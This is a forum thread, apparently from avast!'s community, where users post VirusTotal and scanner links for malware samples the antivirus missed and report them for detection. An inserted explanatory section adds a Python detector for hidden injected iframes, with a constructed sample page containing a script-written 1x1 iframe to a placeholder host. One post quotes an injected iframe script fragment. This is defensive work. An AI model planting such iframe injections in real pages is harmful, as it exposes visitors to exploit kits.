reported to virus AT avast dot com
polonus
-
Not detected TR/Dldr.Delphi.Gen: htxp://zulu.zscaler.com/submission/show/da28c9bae449230b256f0dac6379ed8d-1332854900
and
htxps://www.virustotal.com/file/e7609daa27a2a1756c2c6dacc7909bd1de8e96d11d55c4f238140b47fe48731b/analysis/
reported to virus AT avast dot com,
polonus
-
Found by Chabbo ;)
From Fake scan URL (will not post that here)
VirusTotal
https://www.virustotal.com/file/1dde88e37d0c2bdb21a7e009c43e6adb0745d4dbf2f27c69f1c900aeb6167b97/analysis/1332966051/
Metascan
http://metascan-online.com/results/ht9m21ps66km6k536laohr86pn0mv4iu
Malwarebytes detect as - Rogue.installer.SFXGen1
Sent to avast lab ;)
-
not detected Winlocker (blue screen with sms sending)
https://www.virustotal.com/url/92342723de2defb4c5e79b12582aa304e781d51c0c94a2a532c1182088eb0d94/analysis/1333218729/
-
All files sent to avast via chest and also reported at virus@avast.com.
https://www.virustotal.com/file/53ed4270865af043f1760343d260057f136bbc1e048af5de2498cdecf50fd229/analysis/
https://www.virustotal.com/file/ef2c6266f16f9bc2820f8983562878585fec524e521a0508c5ab7a54bbbdbd68/analysis/
https://www.virustotal.com/file/cd03fdc07dda157dcd6cb0f1c569e379af2850fd86d7c78169420aca251a37a5/analysis/
https://www.virustotal.com/file/0f824b88d9388c4cb01d50cc5a8c2976106eb37f1cb1f4f255194fbdf32539e4/analysis/
https://www.virustotal.com/file/7ef67c670d63e345e3d3978e992554a0d5920fdbf5151c5f4ac154a3abae8666/analysis/
https://www.virustotal.com/file/c612f01e7ab4bb8a2be334184979630a914d60060b3dd8e3aa9005eb637e4a0a/analysis/
https://www.virustotal.com/file/54f7595a44f846f1abbc333d0901a266e1948d99f5757bdaceae5a03ac764b71/analysis/
https://www.virustotal.com/file/080340441fbbb9738e770b4b7604432c9745ae051309dd9ddc8e6b896b120bce/analysis/
https://www.virustotal.com/file/30b4eb6bfc45d7734a59b8c80638f1191d5edd85936a7e8c33df4a8cf2796df2/analysis/
https://www.virustotal.com/file/f32b491aaf3768cb5d58cd0f0c41950c190841aca358a8ffe7caeec40e850bf9/analysis/
https://www.virustotal.com/file/5c396eea9dd6c4b48e69afc20ac8db16b9fcf29b08d51f73c4140443be9a7be0/analysis/
-
Rogue:Win32/FakePAV aliases fake antivirus 2012
uploaded from chest and reported to virus@avast.com
see:
https://www.virustotal.com/file/6ba2818cf9124a1c323cfa31f76df1b9251a66d2883e8d5da14fa2e0693f7751/analysis/1333510969/
-
Not detected by avast: htxp://zulu.zscaler.com/submission/show/544eabcc9d60a9ff34630bca97b03529-1333549339
and htxps://www.virustotal.com/file/c1ff8f8af97cc54baca50aace421ec86b52601808a092a51f13ca01158f191e6/analysis/
reported to virus AT avast dot com,
polonus
-
TR/VB.Downloader.Gen -Not detected....
https://www.virustotal.com/file/811a6db7ffc22a7c576df9c16c0e69dfd99747c83a07d78f17a0da902f076a48/analysis/1333691557/
TrojanSpy.KeyLogger.cqsj-Not detected.
https://www.virustotal.com/file/69115de3bada409ff29936c5351139e30c9688302efeabc92a3d7428c5d159f2/analysis/1333691953/
sent to avast!
-
Not so sure about that one.....( acceleratedvdtoipod.exe ) ;)
Sigcheck
publisher................: Accelerate Software Co., Ltd.
copyright................:
comments.................: This installation was built with Inno Setup: -http://www.innosetup.com
file version.............:
description..............: Accelerate DVD to iPod Converter Setup
First seen by VirusTotal
2011-12-08 08:38:30 UTC ( 3 months, 4 weeks ago )
-
Not so sure about that one.
Sorry Pondus... I grabbed this one from a disinfected PC :)
-
suspected piece of malware.
https://www.virustotal.com/file/9165b7407f6cf386c1c807e458a9150884f083aa25c67339bd62c42978dfd349/analysis/1333693637/
sent for analysis
EDIT: Somoto adware not detected for the past 2 weeks :'(
https://www.virustotal.com/file/54f7595a44f846f1abbc333d0901a266e1948d99f5757bdaceae5a03ac764b71/analysis/1333693975/
sent for analysis
-
Trojan.Win32.Generic.1270F32B
https://www.virustotal.com/file/432ec13b162c9343598c7b8ac44780a420c86bd985d2bcfb9c40fe6b0d7d8d1e/analysis/1333694646/
DR/VB.kqn
https://www.virustotal.com/file/91011b0b63395ff05f398acf9b574623fa09ac73274ddb8a90b10c00f0e6739e/analysis/
EDIT: https://www.virustotal.com/file/5197286e3c5d2df5be0bc74464d71a829db8af5243c47d4a920e11d49d8da46b/analysis/
sent to avast
-
TR/Chifrax.
https://www.virustotal.com/file/a42b7b16d9b1887486d13b7f82a83b6a8617d228d86e0f25b69efa9c43604ae5/analysis/
TR/Offend.KD.469180
https://www.virustotal.com/file/0282225de752d60254a97934c292d542402e471ba139ab1d2ab400eb06e96406/analysis/
WS.Reputation.1
http://www.virustotal.com/latest-report.html?resource=dd8ce2b806edf4c303f7a893886f546d
Trojan.KeyLogger.12238
https://www.virustotal.com/file/5197286e3c5d2df5be0bc74464d71a829db8af5243c47d4a920e11d49d8da46b/analysis/
sent to avast!
-
DIPG.exe:
https://www.virustotal.com/file/8c9798eaff7455e42563fdf43f9d974e2e4c9f9d4c6075430e2ec4154ea2900e/analysis/1333704925/
unknown exe
https://www.virustotal.com/file/9d2f35a89366c6c7460ab2cad14ba25c9a6d4041410e1a927c284f8a927568c7/analysis/1333705527/
sent for analysis.
-
https://www.virustotal.com/file/aa95ab83464a12bab687bcef7ab5bfc5bd98eec8b29b6c7ae83d55a2cd1323ff/analysis/1333777890/
-
Windows Processes Accelerator Rogue
Not detected here: https://www.virustotal.com/file/c88842eb9a89c4c675656f0671113e57a3eeeff36389dd30a23d2583341c0682/analysis/
reported to avast
-
See: htXp://sitecheck.sucuri.net/results/http://cimislia.net
See: htXp://siteinspector.comodo.com/public/reports/show_log?id=544832 But I get a 404 File not found.
Missed here: htXp://zulu.zscaler.com/submission/show/9503176b1afd09c1b82a2fb834476a0f-1333885620
and missed here: htXps://www.virustotal.com/url/cc2ce5819bb48ae41d18d4030dbe91f05556c758cbf1a572985802c6701bee24/analysis/1333885686/
links to suspicious domain: document.write('<iframe src="htXp://link.link dot ru/show
reported to virus AT avast dot com
polonus
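The finding polonus reports above (an iframe emitted through `document.write` that points at a different domain, the pattern urlquery and Zulu label as an injected iframe) can be checked without a sandbox. The script below is an added example, not code from this forum or from any of the scanners mentioned; it applies the same heuristics a web scanner uses (script-written frame, off-site source, 1px or hidden frame) to a page's HTML. The sample page is constructed for the demonstration and the hostnames in it are placeholders, not the site from the post.

```python
"""Heuristic detection of injected/hidden iframes in page HTML.
Added example; the HTML below is constructed, not captured from a real site."""
import re
from html import unescape

# document.write('<...>') or document.write("<...>"). Non-greedy up to the first
# matching quote, so a payload split across concatenated string literals (a common
# obfuscation) is NOT caught by this regex; treat a miss as "not checked", not "clean".
_DOC_WRITE = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
_IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
_SRC = re.compile(r"""(?<![\w-])src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
_DIM = re.compile(r"\b(width|height)\s*=\s*[\"']?(\d+)", re.I)
_HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none|(?:left|top)\s*:\s*-\d+", re.I)


def iframe_host(src):
    """Host of an absolute or protocol-relative URL; None for a relative path."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", src.strip(), re.I)
    return m.group(1).lower() if m else None


def find_iframes(html, page_host):
    """Every <iframe> in the page with the reasons it looks suspicious (may be empty)."""
    write_spans = [(m.start(), m.end()) for m in _DOC_WRITE.finditer(html)]
    findings = []
    for m in _IFRAME.finditer(html):
        attrs = unescape(m.group(1))
        sm = _SRC.search(attrs)
        src = next((g for g in sm.groups() if g is not None), "") if sm else ""
        host = iframe_host(src)
        dims = {k.lower(): int(v) for k, v in _DIM.findall(attrs)}
        reasons = []
        if any(s <= m.start() < e for s, e in write_spans):
            reasons.append("emitted via document.write")
        if host and host != page_host.lower():
            reasons.append("third-party src " + host)
        if any(v <= 1 for v in dims.values()):
            reasons.append("1px or 0px frame")
        if _HIDDEN.search(attrs):
            reasons.append("hidden by style")
        findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


def suspicious_iframes(html, page_host):
    """Frames that are both off-site and stealthy (script-written, tiny, or hidden)."""
    stealth_reasons = ("emitted via document.write", "1px or 0px frame", "hidden by style")
    out = []
    for f in find_iframes(html, page_host):
        offsite = any(r.startswith("third-party") for r in f["reasons"])
        stealth = any(r in stealth_reasons for r in f["reasons"])
        if offsite and stealth:
            out.append(f)
    return out


# Constructed sample page: one legitimate visible embed, one injected 1x1 frame
# written by script, one frame hidden off-screen, one local zero-size frame.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube-nocookie.com/embed/x" width="560" height="315"></iframe>
<script type="text/javascript">
document.write('<iframe src="http://injected.example/show?id=1" width="1" height="1" frameborder="0"></iframe>');
</script>
<iframe src="http://another.example/in.cgi?3" style="position:absolute;left:-9999px;visibility:hidden"></iframe>
<iframe src="/local/help.html" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in suspicious_iframes(SAMPLE_HTML, "www.example.org"):
        print(f["src"], "->", ", ".join(f["reasons"]))
```

The visible video embed is off-site but not flagged, and the local zero-size frame is stealthy but not off-site; a local 0x0 frame can still be part of an injection (it may be a same-host relay), so review those by hand rather than trusting the filter. Fetch the page with a non-browser client only from an isolated machine; a live exploit-kit landing page is what this is meant to spot.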
-
Hi true_indian,
You grabbed reports from here, for instance: for the Windows Processes Accelerator Rogue you gave
: http://forums.comodo.com/comodo-internet-security-cis/submit-malware-here-to-be-blacklisted-2012-no-live-malware-t80088.0.html;msg596587
polonus
-
Hi polonus, no, they are not from the Comodo forum...
Windows Stability Maximizer Rogue
https://www.virustotal.com/file/61ede6100349ee25dcb03d5872d92a388a1636a817d5852423671dcb75606113/analysis/1333944810/
Reported to avast
-
https://www.virustotal.com/file/b8fbdae4a73c2c5961923966fbbc3d1f5e80451fe62e2dec2915340ec004e2db/analysis/1334039907/
-
Windows Antibreaking System Rogue
Not detected...
https://www.virustotal.com/file/c48b0a6509f38869e9fb0a72a9e1a34294037b14e4ef5fa2200b08c0f997ad61/analysis/1334210015/
Reported to avast! 8)
-
Missed trojan.Zlob variant:
htxp://zulu.zscaler.com/submission/show/da0256c76b0000392e0f5ff57c8170fc-1334249398
and
htxps://www.virustotal.com/file/c36d51d5b8185a307171e73720c40b4b6bfbfd1e5186cf39470701bace049a88/analysis/
reported to virus AT avast dot com
-
SecurityTool.T also known as rogue windows cure
https://www.virustotal.com/file/aec468db98c73336f3a6a83a59561a0a3292801d9ce99ea49418b5845a95acda/analysis/1334249705/
reported from chest ;)
-
Hi true_indian,
Why report this one as it is updated that many times and the malware will survive just over an hour before it is being closed again, better to have a web- or netshield block? So, senseless action i.m.o.
polonus
-
Why report this one as it is updated that many times and the malware will survive just over an hour before it is being closed again, better to have a web- or netshield block? So, senseless action i.m.o.
Well, there is no web or net shield block for this... moreover it is a rogue and a critical one, even MBAM detects it, we need that in the avast database ;)
-
Hi true_indian,
How can you create detection for a piece of malware that does not respond any longer or has been closed, and what for? You do not know what you are talking about. And if you have detection for an older variant, what good would it do on the next version? These are generic unclassified malware detections,
polonus
-
Reported to virus AT avast dot com a variant of W32 solimba
htxps://www.virustotal.com/file/3daef7c43e3d4cfd0f706c155f216c0bb5ea1fc1637e67b6c815daf5fa5231cc/analysis/
and
htxp://zulu.zscaler.com/submission/show/5b1c27f8a0bacb574ba5bdd5289642bb-1334505055
polonus
-
see: htxps://www.virustotal.com/file/73f9128f37aeb8d1282b8750df727b5fab39e7eb3700361979ee2d9e358714ad/analysis/
and
htxp://zulu.zscaler.com/submission/show/d2dd47258549965563800957c3bbf034-1334509595 (TR/PSW.Fareit.E)
reported to virus AT avast dot com,
polonus
-
See: htxp://zulu.zscaler.com/submission/show/310bdfbdd56857fee5761037a9448c58-1334825007
VT: htxps://www.virustotal.com/file/04e9a0f7a102418967eae889b0ff8e8725f51d81bad14fc8fa6f7b0cf4c01d89/analysis/
reported to virus AT avast dot com,
polonus
-
Undetected malware (Trojan?) https://www.virustotal.com/file/8d6a364bf9aff67cd1067ab47079223b6ffe21d93e4e90147d6a15710c19e86f/analysis/1335557018/
-
Undetected malware (Trojan?) https://www.virustotal.com/file/8d6a364bf9aff67cd1067ab47079223b6ffe21d93e4e90147d6a15710c19e86f/analysis/1335557018/
did you send the sample to avast?
-
See: htxp://zulu.zscaler.com/submission/show/6d51102e1c5923a997de688f1ff3871b-1335548167
and htxp://vscan.urlvoid.com/analysis/92a816b15e958aee9c26d6a756c0c86b/ZG5mLWV4ZQ==/
TR/Dldr.Delphi.Gen reported to virus AT avast dot com,
polonus
-
Quote from: Pondus on Yesterday at 08:09:28 PM
did you send the sample to avast?
Of course I've sent.
-
Detection missed for Trojan.SuspectCRC, see: htxp://zulu.zscaler.com/submission/show/3b1e347a8ee11ab1061bf2fd647083ff-1335647081
See: hxtp://vscan.urlvoid.com/analysis/dae13e232acaa1cce12d4b608de01540/dXBkYXRlLXVwZA==/
VT results: htxps://www.virustotal.com/file/bc675a110dd06174b5b2e1102576fd6becba71b91b9c0f8c64d6073f2709c8cb/analysis/
reported to virus AT avast dot com,
polonus
-
https://www.virustotal.com/file/38bb8656c63946ece05680a10a71b660cc47dab09a5d5ad82dd1a4befc2cbeb5/analysis/1335704355/
https://www.virustotal.com/file/4e34f75037e77d558b6faba0368bafec5eeabdd24f586b1f6bdb7be4c9301434/analysis/
-
See: htxp://zulu.zscaler.com/submission/show/b17a92cfbde005a450a6866f77668513-1335719417
Found here: hxtp://wepawet.iseclab.org/view.php?hash=9780abb65c19255633e7a5bd7fb25377&t=1335719822&type=js
See: hxps://www.virustotal.com/file/374a11472c3d4a869eaef8bd322ed0f73f6f7b2a8cb8d41632fb385ff798e786/analysis/
reported to virus AT avast dot com
polonus
-
Trojan downloader Banload variant: htxps://www.virustotal.com/url/9c4b70ddfea087abed2b35d8ad1d809d5004de944baa9c5aff5353b61fb950ff/analysis/1335964615/
see: htxps://www.virustotal.com/file/a25731ff295e96bb082faacd2582d7b803908a65e487ab02185c69272d60c86c/analysis/
reported to virus AT avast dot com
-
Not Detected Live BlackHole exploit kit
virustotal
https://www.virustotal.com/file/ac17aca352ae40dfe1dd39e80ddf2fadb5c43119fd48ea12684397843e442786/analysis/1336224968/
urlQuery
http://urlquery.net/report.php?id=51033
sucuri
http://sitecheck.sucuri.net/results/http://seattle-carpet-repair.com/wp-includes/ps.html
Zulu analyzer
http://zulu.zscaler.com/submission/show/cfadbe4214ea2c512e7b438f8f0d79b8-1336225005
sent to avast lab
-
Hi Pondus,
Good find, my friend. I went to that site with malzilla and took the attached picture of the malicious code.
Detected were:
- Detected BlackHole exploit kit HTTP GET request
- Detected Live BlackHole exploit kit
- Detected malicious injected iframe
That is why this stays my favorite URL scanner to verify BlackHole issues: http://urlquery.net/report.php?id=51148
And again it is of the utmost importance for all users here to keep their OS and 3rd party software fully updated
and fully patched, so blackhole could not do any harm via vulnerable software exploits to their comps.
Use the online scanner here to see if you are not vulnerable: http://secunia.com/vulnerability_scanning/online/
polonus
-
Sent in an obvious phishing e-mail.
Came as file, not a link. Should really be picked up, if possible.
https://www.virustotal.com/file/0243b059675aa4853cb1ec73ff1e0407509713307bec8415cdd70c167538adb9/
Only Sophos detects it as Mal/Phish-A
-
Attack log reported to virus AT avast dot com: htxps://www.virustotal.com/file/58f30f9cd84db12c798b8a5f2b562dae257ec8fb834343bbbae0ca416f8c8e8a/analysis/1336351748/
see: hxtp://sakrare.ikyon.se/log.php?id=38752 (log report) typically found for a Blackhole attack as Trojan/Script.Gen, Mal/Iframe-W, JS/Exploit-Blacole.l,
polonus
-
see: hxtp://zulu.zscaler.com/submission/show/be820963ec680424e249fe3e3526fa21-1336927485
and htxp://vscan.urlvoid.com/analysis/26aab2dcab242492e53be0256e4c7d1c/aW5kZXg=/ HTML/Infected.WebPage.Gen2 aka Trojan.JS.Iframe.BDQ
not detected and reported to virus AT avast dot com,
polonus
-
Not detected here: https://www.virustotal.com/file/3635144a0bbf5cf99087114adcc03782f2c958534d2a823aaa68fa357ce09153/analysis/1336989764/
Trojan-FakeAV.Win32.SecurityShield.bfa
reported to avast! ;)
-
Trojan.FakeSysDef. Rogue Data Recovery
http://r.virscan.org/report/e2bd222bd7cb781c511fde03b661aaf7.html
reported for analysis ;)
Fake scan URL [Will not post it here] [Found in my e-mail Junk]
reported to avast
-
Trojan Ransom
https://www.virustotal.com/file/8b09cf7b...336884057/
reported for analysis ;)
(https://www.botnets.fr/images/thumb/0/0f/Reveton_2_AT.png/800px-Reveton_2_AT.png)
-
Backdoor.Win32.ZAccess.lzn
https://www.virustotal.com/file/91badc3df93645b303a381abcb0ca94d/analysis/
reported to avast!
-
roguescanfix_setup.exe
https://www.virustotal.com/file/8eb24d4ef3a8d349aee103c8c2d6a3cfa7f06ed8773552435b2baf30c70987a2/analysis/1336994276/
reported to avast! 8)
-
Not detected: htxps://www.virustotal.com/file/0fc8b26edb1f20c4e9048b9e49322475a6c67017d8496d25e50e63add10443be/analysis/
see: htxp://zulu.zscaler.com/submission/show/b9c0b18ba77ccc2f4f65e6f8d1c3eb87-1337028150
reported to virus AT avast dot com,
polonus
-
Rogue Super scan 4
https://www.virustotal.com/file/dc01f0835207ad7264284e20b0c02048f8705c813c2c8d7071ed2f653d0209aa/analysis/
Reported for analysis ;)
-
- Detected BlackHole exploit kit HTTP GET request
- Detected Live BlackHole exploit kit
http://urlquery.net/report.php?id=54555
http://zulu.zscaler.com/submission/show/57563010e557ca01c429eeefa48933af-1337158962
Detection missed by avast! so sent to virus lab. ;)
Ransom GEMA - German
https://www.virustotal.com/file/911740ab567a7ac3ea3b68d64b21fc4205a24775119a5559b497e592ef5890ec/analysis/
sent to avast!
-
Rogue.Win32.RegistryVictor.
https://www.virustotal.com/file/92a4c559f6d32b24f3b3d2e1eae2ab415e42cc4dda114234df5f7d608d1767ae/analysis/1337165386/
reported to avast!
-
Trojan-Ransom.Win32.Blocker.gzn
https://www.virustotal.com/file/142cd19226855746534068a12c2cda8cb5480501a1452616878c0054301a8b9b/analysis/1337183641/
Reported to avast! ;)
-
French #Ransom - Trojan:Win32/Ransom.FL
https://www.virustotal.com/file/142cd19226855746534068a12c2cda8cb5480501a1452616878c0054301a8b9b/analysis/1337236334/
Reported to avast! ;)
-
Backdoor.Win32.Ruskill.fgj
https://www.virustotal.com/file/f2b51cbb2d5ebcbe244be0757259f76312cad2ae3b69fb1cb70f22ec8a5f16f6/analysis/
Reported to avast!
-
Trojan-PSW.Win32.Tibia!A2
https://www.virustotal.com/file/f7a7ba8f61821f3d783a31d3180947a5dbddd1e849d40e0e879ad44d43425343/analysis/1337239531/
Trojan.Generic.KD.623383
https://www.virustotal.com/file/b1427b1e00f422d56688901e9444bf85f2e945374319eadf951f6e94a8e2de95/analysis/
Gen:Variant.Barys.2209
https://www.virustotal.com/file/94560f73d8ef265ad02fc91881e09b7f746c9e16e7636740137835d39a6213dc/analysis/
TR/Fraud.Gen4
https://www.virustotal.com/file/34a9848c7fc4a7fb304e597cde45efbf13fd4b1aed420646ce6d322fe781e5ea/analysis/
Reported to avast!
-
Trojan.Win32.Autorun.dm (v)
https://www.virustotal.com/file/84c90377421a63cfe767c17d7079877b7dab0f4c63d6b0d9f87ddb48e7a50360/analysis/
Reported for analysis
-
Hi true indian,
Could well be that bmp.exe is picked up by avast and flagged as PUP risktool. For safe variants of that media player tool see: htxp://www.backgroundtask.eu/Systeemtaken/taakinfo/30932/BMP.exe/
htxp://www.runscanner.net/lib/bmp.exe.html and
where this Chinese active malcode is being flagged as TR/FlyStudio.AI.1129, see: htxp://zulu.zscaler.com/submission/show/002b26f390d7be7416d1574ab05c8298-1337262299 avast does not detect it yet (possibly as PUP when run): hxtp://vscan.urlvoid.com/analysis/0cb2f654fd22256efa7ae84f2b8c9625/Ym1wLWV4ZQ==/
See Comodo analysis here: htxp://camas.comodo.com/cgi-bin/submit?file=84c90377421a63cfe767c17d7079877b7dab0f4c63d6b0d9f87ddb48e7a50360
Another variant of mentioned TR/FlyStudio.AI.1129 trojan-dropper is: File Name: shengguangtupian.ex-
MD5: 0cb2f654fd22256efa7ae84f2b8c9625
974890 AntiVir 2009/06/12 11:17:27 (CEST)
Meaning that bmp.exe is a 2009 variant trojan dropper that was resurrected and re-launched 2 days ago, so old wine in new sacks really,
reported the above to virus AT avast dot com for verification,
polonus
-
Not detected by avast: htxps://www.virustotal.com/file/528e5fe23f9208f9f3726fdcd794517d3df3eaaef4b055ef88017eb9bc9fadc2/analysis/
see: htxp://zulu.zscaler.com/submission/show/bad6c4bbfdb76b8cc8abeaf333ae3014-1337263557
A block should be considered because there are 18 reports of various MSIL/Solimba application or Gen:Variant.Barys.2069 active from that domain &
bad host for 1 yr and 7 months on 896 appearances in spam e-mail or spam post urls.
polonus
-
Hi true indian,
Could well be that bmp.exe is picked up by avast and flagged as PUP risktool. For safe variants of that media player tool see: htxp://www.backgroundtask.eu/Systeemtaken/taakinfo/30932/BMP.exe/
htxp://www.runscanner.net/lib/bmp.exe.html and
where this Chinese active malcode is being flagged as TR/FlyStudio.AI.1129, see: htxp://zulu.zscaler.com/submission/show/002b26f390d7be7416d1574ab05c8298-1337262299 avast does not detect it yet (possibly as PUP when run): hxtp://vscan.urlvoid.com/analysis/0cb2f654fd22256efa7ae84f2b8c9625/Ym1wLWV4ZQ==/
See Comodo analysis here: htxp://camas.comodo.com/cgi-bin/submit?file=84c90377421a63cfe767c17d7079877b7dab0f4c63d6b0d9f87ddb48e7a50360
Another variant of mentioned TR/FlyStudio.AI.1129 trojan-dropper is: File Name: shengguangtupian.ex-
MD5: 0cb2f654fd22256efa7ae84f2b8c9625
974890 AntiVir 2009/06/12 11:17:27 (CEST)
Meaning that bmp.exe is a 2009 variant trojan dropper that was resurrected and re-launched 2 days ago, so old wine in new sacks really,
reported the above to virus AT avast dot com for verification,
polonus
Thanks polonus, you are a quick person and a good teacher! ;)
-
Ransom Kuluoz
https://www.virustotal.com/file/361e0b4554ca3748f3400138dded289532f7aa53fd1c2b2fd2e921df531cdf21/analysis/1337270928/
remains undetected....
http://zulu.zscaler.com/submission/show/fa1f2b17cb31d1b0bb10da8ead1058e1-1337270982
reported to avast! ;)
-
Rootkit Sinowal/Mebroot
https://www.virustotal.com/file/c46c9904032aa9cb4939ba36c270a39a3fbbda0335f9d7f2e801009fbdfe7820/analysis/
https://www.virustotal.com/file/91889b00b570964e1689cfa188992ad9bd6d2897adf9ca57f1002d467de913ea/analysis/
https://www.virustotal.com/file/8a295ccfb0cb7c41d2588662b81dc9f7c2b993da40019303ab89eff31e15d372/analysis/
Reported to avast! ;)
-
Ransom.Win32/LockScreen.AJU
https://www.virustotal.com/file/1673ec3cc708e5092276b2104bc1836df8a370f8077eda1a5ae4126212a7c835/analysis/
Reported to avast!
-
Windows Safeguard Upgrade Rogue
https://www.virustotal.com/file/92aad05c19d5e16f0acd5239310cc769eabb1c42de6bc46a4a2ae02b023a8ddb/analysis/
Reported to avast! 8)
-
Rootkit Sinowal/Mebroot
As a side note, I can confirm these are real rootkit samples... found them on many of my clients' machines during online remote assistance... they are fresh ones spreading here in India.... anybody who wants samples please PM me ;D
-
Ransomware - Polska Policja (Polish Police)
https://www.virustotal.com/file/d2164cdbc9c78db0115f382a139ccd758f8a25ebfc5ab3e0034e7aef0fe0b6b4/analysis/
Reported to avast!
(http://i.imgur.com/tCbAF.jpg)
-
Ransom Kuluoz
https://www.virustotal.com/file/361e0b4554ca3748f3400138dded289532f7aa53fd1c2b2fd2e921df531cdf21/analysis/1337270928/
remains undetected....
http://zulu.zscaler.com/submission/show/fa1f2b17cb31d1b0bb10da8ead1058e1-1337270982
reported to avast! ;)
First seen by VirusTotal
2010-06-25 09:46:39 UTC ( 1 year, 10 months ago ) yea.....must be malware ;)
Sigcheck
publisher................: MBTY
product..................: RansomHide
internal name............: ransomhide
file version.............: 0.06.0024
original name............: ransomhide.exe
comments.................: For http://forum.simplix.ks.ua
-
Rootkit Sinowal/Mebroot
https://www.virustotal.com/file/c46c9904032aa9cb4939ba36c270a39a3fbbda0335f9d7f2e801009fbdfe7820/analysis/
https://www.virustotal.com/file/91889b00b570964e1689cfa188992ad9bd6d2897adf9ca57f1002d467de913ea/analysis/
https://www.virustotal.com/file/8a295ccfb0cb7c41d2588662b81dc9f7c2b993da40019303ab89eff31e15d372/analysis/
Reported to avast! ;)
First seen by VirusTotal
2012-04-08 13:33:07 UTC ( 1 month, 1 week ago ) and only detected by SOPHOS ......suspicious ?
why not upload to SOPHOS and see if they give it a FP ;) https://secure.sophos.com/support/samples/
-
There is detection for Polska Policja: https://www.virustotal.com/file/7bbd11c0e9902e6bed46bb4ea2832be45155591f4d85356d5f961b03489a21e1/analysis/
pol
-
Rogue Super scan 4
https://www.virustotal.com/file/dc01f0835207ad7264284e20b0c02048f8705c813c2c8d7071ed2f653d0209aa/analysis/
Should be flagged as PUP, if flagged at all.
See: hXtp://www.mcafee.com/us/downloads/free-tools/superscan.aspx
-
Hi !Donovan,
You are right, as one of the scan results gives specifically "non-malicious",
polonus
-
Ransom Kuluoz
https://www.virustotal.com/file/361e0b4554ca3748f3400138dded289532f7aa53fd1c2b2fd2e921df531cdf21/analysis/1337270928/
remains undetected....
http://zulu.zscaler.com/submission/show/fa1f2b17cb31d1b0bb10da8ead1058e1-1337270982
reported to avast! ;)
First seen by VirusTotal
2010-06-25 09:46:39 UTC ( 1 year, 10 months ago ) yea.....must be malware ;)
Sigcheck
publisher................: MBTY
product..................: RansomHide
internal name............: ransomhide
file version.............: 0.06.0024
original name............: ransomhide.exe
comments.................: For http://forum.simplix.ks.ua
NORMAN lab
ransomhide.exe : Clean!
-
There is detection for Polska Policja: https://www.virustotal.com/file/7bbd11c0e9902e6bed46bb4ea2832be45155591f4d85356d5f961b03489a21e1/analysis/
pol
Pol, I guess that's the same one with a different file MD5. ::) The sample I have is not detected yet. And as far as the Mebroot samples go, I will try looking into a Sophos FP...
Thanks! ;D
-
Here we go again... ;D
Same baddie but different MD5
https://www.virustotal.com/file/f85ed4acbf504d67407f385021c2c1bd5c14ab71dd85809aef5b586038039c60/analysis/
Reported to avast!
-
TR/Crypt.XPACK.Gen
https://www.virustotal.com/file/98562164ccf323a656495fa63549f16e9a589e5339e693b109efb37cb6ae08c0/analysis/
Trojan-Ransom.Win32.Foreign.oud
https://www.virustotal.com/file/89c35017051d428b20fcfbb00a653b6ae6df9973d8efaa4ceec269f0e0383027/analysis/
Reported to avast!
-
https://www.virustotal.com/file/34bba08af67f71658c4e117970bae6e37f199279adb925aa5bc44a3ee2abd961/analysis/1337332685/
fake AV sent to avast.
-
https://www.virustotal.com/file/34bba08af67f71658c4e117970bae6e37f199279adb925aa5bc44a3ee2abd961/analysis/1337332685/
fake AV sent to avast.
jotti
http://virusscan.jotti.org/en/scanresult/a50b864f890356e660242e9ce4826cbf3605f09d
Metascan
http://metascan-online.com/results/u9nbucv90cm0nbeprkmkevi1ln3eei1a
detected by Malwarebytes - Rogue.FakeAV
detected by superantispyware - Trojan.Agent/Gen-FakeProtector
-
Hi Pondus,
Thank you, Pondus, keep these reports coming to add to and to check avast detection. You prove that one has to be selective as to what to report to virus AT avast dot com, so that the detections fit their categories.
This thread proves that the common user should have additional non-resident protection next to his avast resident AV solution WITH the shields enabled, like MBAM and SAS on demand, and keep these fully updated and perform a quick scan with them now and again. Personally I combine that with some third-party in-browser protection like DrWeb's online scanner and BitDefender TrafficLight and QuickScan to further close the vulnerability gap/vulnerability window. But scanning feedback is very important. If DrWeb's online pre-scanner misses detections I report back (that is why Dim@rik came to join our forums), and also when Zscaler Zulu does not have detection I will give feedback on what has been found with other scanners.
On a side note: I tried Quttera WIS (beta) at htxp://www.quttera.com/ against all sorts of verified malicious URLs and every time the scan comes up as clean. Is this scanner a scam for their services or just worthless?
polonus
-
See: htxp://zulu.zscaler.com/submission/show/7168cb24855e4ad93246acc1fd01ae81-1337355518
and accompanying VT results: htxps://www.virustotal.com/file/e56df40e2ba498dec082ef61412c04c578636c618f07cbec6bd1ecf060360ebf/analysis/
trojan banker detection missed,
reported to virus AT avast dot com,
polonus
-
W32/Ransom.AJL
https://www.virustotal.com/file/49cbc766c4b4ebec1e1c5d4cac5283062b1f0eecde4e9eaeab4bad8c11d138f1/analysis/
Trojan-Downloader.Win32.Banload.bvkc
https://www.virustotal.com/file/19d7d3969e18a42291db48db5b97491f41c188aae53c96277aac6c64cf91b933/analysis/
Reported to avast! ;)
-
Trojan.Winlock.5600
https://www.virustotal.com/file/49cbc766c4b4ebec1e1c5d4cac5283062b1f0eecde4e9eaeab4bad8c11d138f1/analysis/
Trojan-Downloader.Win32.LilyJade.a
http://virusscan.jotti.org/en/scanresult/28eafbf1e9e1f01a517e4c9786563018338a7fe8
Reported to avast!
-
TR/Crypt.XPACK.Gen
https://www.virustotal.com/file/49cbc766c4b4ebec1e1c5d4cac5283062b1f0eecde4e9eaeab4bad8c11d138f1/analysis/
Worm/Rebhip.A.4947
https://www.virustotal.com/file/88153a883b7633b1fc0208fe8cffdb3cd9e87f1f4aac5e1d74949524a91155d4/analysis/
TR/Crypt.ASPM.Gen
https://www.virustotal.com/file/3984e91ec5b0ee5b3a0e1efb9b9fc4312e004bfc2b27a88eabc938bf058b0cda/analysis/
Win32/IRCBot.worm.variant
https://www.virustotal.com/file/ffc086b6577dac19c99f53569dec5a86e0a6f5709d9588c56ca75f499d883a62/analysis/
Malware.JS.Generic (JS)
